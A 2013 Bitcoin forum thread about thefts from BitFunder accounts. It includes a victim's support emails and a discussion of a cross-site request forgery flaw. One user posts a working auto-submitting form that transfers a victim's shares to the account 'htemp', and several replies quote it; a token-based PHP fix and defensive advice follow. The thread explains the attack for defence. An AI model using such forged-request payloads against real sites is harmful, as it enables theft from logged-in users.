Bitcoin Forum
Author Topic: BitFunder.com has been hacked and IT IS BitFunder's fault  (Read 30108 times)
HorseRider (OP)
Donator, Legendary
Activity: 1120, Merit: 1001
July 06, 2013, 06:23:04 AM
Last edit: July 06, 2013, 06:35:50 AM by HorseRider
#1

A long-time Avalon miner and a very trustworthy Bitcoiner has emailed me the story. It is written in Chinese and I have translated it. I just post this letter here for discussion.


My username on BITFUNDER is lixiulai@sina.com, and its login password is different from those of my other accounts. On 20 June, I found that my 2,869 shares of G.SDICE and 9.99 BTC had disappeared. I checked the records and found that my Bitcoin had first been used to purchase G.SDICE, and then all the G.SDICE shares were transferred to another account, “htemp”. I did not know before that shares on BITFUNDER could be transferred. I wrote an email to BITFUNDER support asking them to freeze the htemp account, and my request was ignored. Then I kept emailing the BITFUNDER manager, stating that the share transfer function is very dangerous without 2-factor authentication and asking them to repay my loss. Surprisingly, the very next day I found that BITFUNDER had forced users to enable 2FA before transferring shares, and I received a letter saying that their exchange was not at fault and that it was my own fault for not enabling 2-factor authentication.

Another BITFUNDER user, Miss Wang Qiaoqiao, became a victim of the “htemp” theft at nearly the same time as me. Then I started to suspect that BITFUNDER itself had been hacked, since htemp could steal from two people at the same time.

That’s the summary. Here are the records of the emails between BITFUNDER support and lixiulai@sina.com.

=============================

My Support Requests

--------------------------------------------------------------------------------
Creation Date: 2013-06-25 19:54:38 | Ticket ID: XSQ-194159 | Subject: I want to know who operated my account. | Status: Closed
2013-06-25 19:54:38 Posted By: Me

After my account was stolen, there was only this reminder. This transfer function is too dangerous: if I have not enabled 2-factor, this function should not be usable. I want to know who operated my account.
2013-06-25 19:58:26 Posted By: Me

Error: Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.


Transfer Shares:

Error: Google 2-Factor MUST be enabled to transfer shares.
2013-06-25 20:02:50 Posted By: Me

Why, only after my account was stolen, has your website become like this?
 
2013-06-26 17:57:50 Posted By: Support Staff

Transfer has been limited to 2-factor only support.

Our server was not hacked. Someone used your account that was stolen from somewhere else.

Not our fault.

We are sorry that it happened. We offered protection option to users. You did not use it.

Thank You,
BitFunder Support
 
Creation Date: 2013-06-25 05:32:48 | Ticket ID: TYL-678016 | Subject: I hope you can give me some compensation. | Status: Closed
2013-06-25 05:32:48 Posted By: Me

My account's BTC was used to buy shares, which were then transferred away. I did not know that your website had a share transfer function. My password-theft case can also be presented to www.weexchange.co. I hope you can give me some compensation.
2013-06-25 16:49:49 Posted By: Support Staff

Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.

You do not and have not had 2-factor enabled. We have no way to verify that you were actually hacked or are the hacker.

We cannot offer any sort of compensation for users who do not properly protect their accounts and passwords.
We have secured our site to the best of our ability, which was not hacked. Your account information was leaked or stolen and we provided the ability of protection beyond that with 2-factor and you chose not to enable it.

Thank You,

HorseRider (OP)
Donator, Legendary
Activity: 1120, Merit: 1001
July 06, 2013, 06:38:29 AM
#2

HorseRider (OP)
Donator, Legendary
Activity: 1120, Merit: 1001
July 06, 2013, 06:39:48 AM
#3

Records of Bitqiaoqiao@gmail.com:


 
Quote
2013-06-19 01:42:16 Send Transfer To: htemp
TAT.ASICMINER: 10 Share/s
2013-06-19 01:42:02 Send Transfer To: htemp
AMC: 5,617 Share/s
2013-06-19 01:41:50 Send Transfer To: htemp
G.ASICMINER-PT: 8 Share/s

🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 06:42:08 AM
#4

The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.
🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 06:44:03 AM
Last edit: July 06, 2013, 06:54:10 AM by TradeFortress
#5

This is how BitFunder could have fixed it:

Code:

<?php
session_start();
// One unpredictable token per session, from a CSPRNG rather than uniqid().
if (!isset($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}
// Embed it in every state-changing form; the server must then reject any
// POST whose 'csrf' field does not match (hash_equals) the session value.
echo "<form action='transfer' method='post'>
<input type='hidden' name='csrf' value='" . htmlspecialchars($_SESSION['csrf']) . "'>";

...


Yes, BitFunder's site was and is still vulnerable.
superduh
Hero Member
Activity: 602, Merit: 500
July 06, 2013, 07:08:21 AM
#6

These are serious flaws and need to be fixed on alllll sites

ok
🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 07:19:26 AM
#7

Quote
These are serious flaws and need to be fixed on alllll sites

This isn't a 0day that was suddenly discovered. It doesn't need to be fixed on "allll" sites because most sites are not vulnerable in the first place:



Every single function on Inputs.io:

Quote
$("#turnonnotify").click(function(){
   $.post("ajax", {token: $.cookie("token"), action: "changenotify", email: "yes"});
   $(this).fadeOut(250).fadeIn(250).html("Turn off");
});
pgbit
Sr. Member
Activity: 771, Merit: 258
July 06, 2013, 08:08:48 AM
#8
Would the account hack described above have occurred if 2 factor auth was used?

🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 08:12:43 AM
#9

Not through share transfers, but through another method yes. 2FA doesn't help.

Would be fixed if Bitfunder implemented a csrf token.
PurpleTentacle
Sr. Member
Activity: 384, Merit: 250
July 06, 2013, 08:19:07 AM
#10

Quote
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?


Quote
Yes, BitFunder's site was and is still vulnerable.


If so, how can we protect ourselves?

Rannasha
Hero Member
Activity: 728, Merit: 500
July 06, 2013, 08:27:42 AM
#11

Quote
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?

Yes.


Quote
Quote
Yes, BitFunder's site was and is still vulnerable.


If so, how can we protect ourselves?

Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.
PurpleTentacle
Sr. Member
Activity: 384, Merit: 250
July 06, 2013, 08:52:43 AM
#12

Quote
Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.

🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 08:56:59 AM
#13

Quote
Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Quote
Ok, thanks. I always close any open tabs when I log in to exchanges.

You need to log out.
PurpleTentacle
Sr. Member
Activity: 384, Merit: 250
July 06, 2013, 09:02:22 AM
#14

Quote
Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Quote
Ok, thanks. I always close any open tabs when I log in to exchanges.

Quote
You need to log out.

Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

monsterer
Legendary
Activity: 1008, Merit: 1002
July 06, 2013, 09:37:34 AM
#15

Quote
Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

With the monumental security flaws demonstrated in this thread, I would personally:

* Get my bitcoins out
* Get out
* Never come back

The person who wrote that code has no business being in business.

Cheers, Paul.
TsuyokuNaritai
Hero Member
Activity: 574, Merit: 500
July 06, 2013, 09:40:46 AM
#16

Are you protected if you use BitFunder in a different browser?

Deprived
Hero Member
Activity: 532, Merit: 500
July 06, 2013, 11:48:29 AM
#17

Quote
Are you protected if you use BitFunder in a different browser?

Against the easiest ways to attack yes - but I wouldn't recommend thinking of it as 100% safe.
nubbins
Legendary
Activity: 1554, Merit: 1009
July 06, 2013, 12:39:12 PM
#18

Yipes! As someone who has worked in web development for several years, this is SHOCKING.

I created an account a while ago, but never deposited any BTC because I didn't want to use WeExchange. Now I'm glad that I never!

🏰 TradeFortress 🏰
Bitcoin Veteran, VIP, Legendary
Activity: 1316, Merit: 1043
July 06, 2013, 12:45:35 PM
#19

The easiest way to protect yourself would be using web applications that are coded securely. Now I'm not sure if btct.co uses an anti csrf token (I don't think it does?), but their PIN / 2 FA system makes this attack less useful (an attacker can just use JS to submit ~100 most common PINs)
joele
Legendary
Activity: 1022, Merit: 1000
July 06, 2013, 01:19:13 PM
#20

Quote
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Yes, this code will work if you
Quote
The problem was something like this on a random site you visited:

Code:
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>


Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?


Quote
Yes, BitFunder's site was and is still vulnerable.


If so, how can we protect ourselves?

Enable your 2fa, this code will not work if you enable your 2fa, because once you enabled your 2fa it need the 2fa field with correct value to complete the transfer.